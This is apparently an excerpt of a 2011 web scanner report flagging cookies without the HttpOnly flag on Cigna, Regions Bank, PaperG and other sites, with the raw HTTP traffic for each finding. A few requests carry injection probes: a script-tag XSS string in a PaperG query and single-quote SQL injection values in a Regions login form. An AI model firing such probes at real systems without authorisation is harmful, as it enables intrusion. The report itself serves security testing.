content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:39 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayPasswordId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000-q2wF_IgV38WKNH43KqfhRB:15eoj2var; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0


8.3. https://cignaforhcp.cigna.com/wps/portal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /wps/portal

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /wps/portal HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/
Cache-Control: max-age=0
Origin: https://cignaforhcp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:31:34 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 20913
ibm-web2-location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_ozADAyM_0-BAg9BgYwNfQ_1wkA6zeAMcwNFA388jPzdVvyA7rxwABvDatQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID_CHCP=0001qDHqEZIhYEkdLt4C0F9Adey:1DE5MNIG9P; Path=/
Set-Cookie: PD_STATEFUL_31b6dc34-289d-11e0-8e97-2054895daa77=%2Fwps; Path=/
Content-Length: 20575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/
...[SNIP]...

8.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Cui-Bytes: 1087
X-TeaLeaf-Page-Cui-Events: 2
X-TeaLeaf-Page-Dwell: 5810339
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: BeforeUnload
X-TeaLeaf-Page-Url: /web/public/guest
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; MYCIGNA_OEP_JSESSIONID=0000yQIxVsxIeGgNdda8oLY1ni2:15ntus9ve; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=C5A87FF47FD9107F08B6A536181C0CE6; __utmz=252045595.1305563482.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=252045595.1041628650.1305559758.1305559758.1305563482.2; __utmc=252045595; PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme
Content-Length: 266

<ClientEventSet PostTimeStamp="1305565653539" ><ClientEvent Count="2" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="5810339" DateSince1970="1305565653539
...[SNIP]...

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 17:07:36 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000SfgkMCJXVtjzWixM8nxmOLM:15ntus9ve; Path=/
Set-Cookie: PD_STATEFUL_2af57d96-4b85-11e0-b595-20548963aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 266 bytes in 1ms.

</body>
</html>

8.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

8.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

8.7. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=sg41ptigwefyqt55op0wstbb; path=/
Vary: Accept-Encoding
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

8.8. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login.aspx?brand=regions HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
Origin: https://www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 110

ignore=&locationZipCode=ZIP+Code&locationCity=City&locationState=State&googleSearch=&OnlineID=%27&Password=%27

Response

HTTP/1.1 301 Moved
Set-Cookie: securebank.regions.com-https=R812380214; path=/
Date: Mon, 16 May 2011 15:20:12 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
Set-Cookie: ASP.NET_SessionId=hndv2y55u1otew45h3eaarf0; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html
Content-Length: 0


8.9. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...

8.10. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000050)%3C/script%3E HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=0ke9o5cho7nukfh3mrbgi89uo3; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5506


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...

8.11. https://www.paperg.com/forgot.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.paperg.com
Path:   /forgot.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot.php HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
Referer: http://www.paperg.com/publishers/flyerboard.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Set-Cookie: PHPSESSID=fq6c4o1f1f4ashphj9o9s9e8j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 3158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...

8.12. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Set-Cookie: PHPSESSID=3oik1g2sp46e2tucskv23ggv70; expires=Thu, 03-Oct-2052 06:39:20 GMT; path=/; domain=.placelocal.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Vary: Accept-Encoding
Content-Length: 6267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

8.13. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFID=52158672;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFTOKEN=42630575;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: JSESSIONID=0430e8dac9c0442b7260TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=124614;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Mon, 16 May 2011 16:46:14 GMT
Connection: close


<script type="text/javascript" language="javascript">
   var str="launch,Bisys_TopFrame.cfm"; //string value to designate calls
   var urlLocation = self.location.href.toLowerCase(); //string valu
...[SNIP]...

8.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?directMail=true&sc=UAASWI HTTP/1.1
Host: wwwa.applyonlinenow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 15:28:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000wkGjL9NUQ6om08aGILL54g2:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US


8.15. http://ads.bridgetrack.com/site/rtgt.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /site/rtgt.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/rtgt.asp?BU=167&ref=http%3A//www.regions.com/personal_banking/email_starting_net.rf&p=http%3A//www.regions.com/personal_banking/loans_credit.rf&r=0.049829987809062004 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTASES=SID=56027293DC7140588B495E696083C1E4; BTA167=; BTA=GUID=05443B076F794FD18F0B4B508B843066

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 15 May 2011 15:17:16 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=05443B076F794FD18F0B4B508B843066; expires=Thu, 10-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTA167=; expires=Thu, 10-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=56027293DC7140588B495E696083C1E4; path=/
Date: Mon, 16 May 2011 15:17:15 GMT
Connection: close
Content-Length: 0


8.16. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dd159eaa044675c&callback=_ate.ad.hrr&pub=xa-4cd989666c0edf81&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.xsnet.com%2F&11g3bcg HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305283016.60|1305283016.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 16 May 2011 17:08:13 GMT
Set-Cookie: di=1305283016.1FE|1305283016.60; Domain=.addthis.com; Expires=Wed, 15-May-2013 17:08:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 16 May 2011 17:08:12 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

8.17. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
